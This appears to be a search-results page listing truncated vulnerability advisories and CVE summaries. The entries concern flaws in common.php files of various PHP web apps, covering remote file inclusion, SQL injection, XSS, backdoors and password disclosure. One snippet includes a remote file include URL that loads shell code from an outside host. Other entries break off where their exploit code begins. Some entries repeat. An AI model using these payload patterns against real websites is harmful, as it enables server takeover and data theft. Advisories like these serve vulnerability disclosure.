gnopaste <= 0.5.3 (common.php) Remote File Include Vulnerability

No description provided by source. gnopaste = 0.5.3 - Remote File Include Vulnerabilities Script site: http://sourceforge.net/projects/gnopaste made by SmokeZ [email protected] http://www.site.com/gnopastepath/includes/common.php?rootpath=SHELLCODEURL.txt? milw0rm.com 2006-05-30...

Poplar Gedcom Viewer <= 2.0 (common.php) Remote Inclusion Vuln

No description provided by source. /\ Poplar Gedcom Viewer v2.0 final ========================================================= Published : 2007-01-00 Remote: Yes Site:ftp://ftp1.comscripts.com/PHP/689poplarge-20.zip Author: GolDM = Mahmoodali Contact: [email protected]...

phpAtm <= 1.21 (include_location) Remote File Include Vulnerabilities

No description provided by source. phpAtm = v1.21 includelocation Remote File Inclusion Exploit Level : Dangerous Download : http://phpatm.free.fr/ Version : v1.21 Found By: KinSize MHG Security Team Code : include$includelocation.'include/conf.php'; exploit:...

netclassifieds (sql/xss/full path) Multiple Vulnerabilities

No description provided by source. Application: NetClassifieds: -Free Edition -Standard Edition -Professional Edition -Premium Edition Web Site: http://www.scriptdevelopers.net/ Versions: all Platform: linux, windows Bug: multiple injection sql , xss , full path Fix Available: Yes...

YAAP <= 1.5 __autoload() Remote File Inclusion Vulnerability

No description provided by source. -------------------------------------------------------------------------------- Script name.......:Yaap Affected Version.....:1.5 D.page..:http://yaap.oskbraniewo.pl/download/yaap15.tar.gz...

Nucleus CMS 3.0,Blog:CMS 3,PunBB 1.x Common.PHP Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/10760/info Nucleus CMS, Blog:CMS, and PunBB are vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable computer...

Fully Modded phpBB <= 2021.4.40 Multiple File Include Vulnerabilities

No description provided by source. Fully Modded phpBB 2 Remote File Include PHPBB Exploit 2 Source Code: http://phpbbfm.net/support/indexfm.php http://kent.dl.sourceforge.net/sourceforge/phpbbfm/FM2021-4-40.tar.gz Vulnerable Code: include'includes/common.php'; $phpbbrootpath = $foingrootpath...

PHORUM 3.x/5.x Common.PHP Remote File Include Vulnerability

No description provided by source...

Adult WebMaster PHP - Password Disclosure

Adult WebMaster PHP - Password Disclosure + Exploit:Adult Webmaster PHP - Password Disclosure + Author: vinicius777 + Email/Twitter: vinicius777 AT gmail @vinicius777 + Vendor Homepage: http://sourceforge.net/projects/adultweb/ 1 Administrative Credential Disclosure PoC: root@kali:/ curl...

openx 2.8.10 /lib/max/Delivery/common.php 后门漏洞

No description provided by source...

MetInfo 5.1 /include/common.php SQL注入漏洞

\include\common.inc.php代码第30行产生了变量覆盖漏洞，代码33行的$tablepre可以覆盖掉，所以导致SQL注入漏洞产生。 MetInfo 5.1...

phpshe v1. 1 multiple SQL injection and file include vulnerabilities Getshell-a vulnerability warning-the black bar safety net

// / Phpshe v1. 1 Vulnerability / ======================== / By: : Kn1f3 / E-Mail : [email protected] // 0×0 0 overall probably the parameters of the transmission font=Verdana, Helvetica, Arial, sans-serifsize=12px /size/font //common.php if getmagicquotesgpc ! empty$GET &&...

Gocart 1.0.2 Remote File Inclusion

============================== gocart-1.0.2 RFI Vulnerability ============================== Vendor: http://s3.amazonaws.com/gocart/gocart-1.0.2.zip Date: 2012-1-27 Author : indoushka Exploit By indoushka ------------- Function: includeonce File: CodeIgniter.php Line: 10 Exploit:...

2Moons 1.4 Remote File Inclusion

============================== 2Moons v1.4 RFI Vulnerability ============================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=0 0 . .--. .--. .---. . 1 1 .'| / | 0 0 | --: --: / .-.| .-. . . 1 1 | / | | | 0 0 '---' --' --' ' -'--'---| 1 1 ; 0 0 Site : 1337day.com -' 1 1 Suppor...

CVE-2011-3701

AlegroCart 1.2.3 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by common.php and certain other files...

CVE-2011-1953

Multiple cross-site scripting XSS vulnerabilities in common.php in Post Revolution before 0.8.0c-2 allow remote attackers to inject arbitrary web script or HTML via an attribute of a 1 P, a 2 STRONG, a 3 A, a 4 EM, a 5 I, a 6 IMG, a 7 LI, an 8 OL, a 9 VIDEO, or a 10 BLOCKQUOTE element...

CVE-2011-1952

common.php in Post Revolution before 0.8.0c-2 allows remote attackers to cause a denial of service infinite loop via malformed HTML markup, as demonstrated by an a sequence...

Design/Logic Flaw

common.php in Post Revolution before 0.8.0c-2 allows remote attackers to cause a denial of service infinite loop via malformed HTML markup, as demonstrated by an a sequence...

Cross site scripting

Multiple cross-site scripting XSS vulnerabilities in common.php in Post Revolution before 0.8.0c-2 allow remote attackers to inject arbitrary web script or HTML via an attribute of a 1 P, a 2 STRONG, a 3 A, a 4 EM, a 5 I, a 6 IMG, a 7 LI, an 8 OL, a 9 VIDEO, or a 10 BLOCKQUOTE element...

CVE-2011-1953

Multiple cross-site scripting XSS vulnerabilities in common.php in Post Revolution before 0.8.0c-2 allow remote attackers to inject arbitrary web script or HTML via an attribute of a 1 P, a 2 STRONG, a 3 A, a 4 EM, a 5 I, a 6 IMG, a 7 LI, an 8 OL, a 9 VIDEO, or a 10 BLOCKQUOTE element...